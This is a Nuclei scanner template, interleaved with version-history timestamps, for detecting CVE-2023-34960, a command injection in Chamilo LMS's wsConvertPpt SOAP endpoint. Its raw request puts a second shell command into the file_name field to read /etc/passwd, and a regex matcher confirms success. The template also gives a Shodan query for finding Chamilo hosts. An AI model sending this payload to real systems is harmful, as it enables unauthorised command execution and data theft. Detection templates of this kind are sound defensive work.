2023-06-16 17:12:10 +00:00
id : CVE-2023-34960
info :
name : Chamilo Command Injection
author : DhiyaneshDK
2023-08-31 11:46:18 +00:00
severity : critical
2023-08-18 07:46:53 +00:00
description : |
2023-08-18 08:00:45 +00:00
A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS.
2023-06-16 17:12:10 +00:00
reference :
- https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D
- https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py
2023-08-31 11:46:18 +00:00
- http://chamilo.com
- http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html
- https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-34960
cwe-id : CWE-77
2024-03-23 09:28:19 +00:00
epss-score : 0.93541
epss-percentile : 0.99046
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
2023-06-16 17:12:10 +00:00
metadata :
verified : "true"
2023-09-06 11:43:37 +00:00
max-request : 1
2023-08-31 11:46:18 +00:00
vendor : chamilo
product : chamilo
2023-09-06 11:43:37 +00:00
shodan-query : http.component:"Chamilo"
2024-01-14 09:21:50 +00:00
tags : cve,cve2023,packetstorm,chamilo
2023-06-16 17:12:10 +00:00
http :
- raw :
- |
POST /main/webservices/additional_webservices.php HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml; charset=utf-8
<?xml version="1.0" encoding="UTF-8"?>
2023-06-16 17:34:40 +00:00
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
2023-06-16 17:12:10 +00:00
matchers-condition : and
matchers :
2023-06-16 17:34:40 +00:00
- type : regex
regex :
- "root:.*:0:0:"
2023-06-16 17:12:10 +00:00
part : body
- type : word
part : header
words :
- text/xml
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022061c431fdf207f7ea4d36d8cc273540d96b24bad5eb6f740a6abc2f9d119d13af022100e258f9ef363ecef737199af9fed98977a2abf54592595103173537d46eafe938:922c64590222798bb761d5b6d8e72950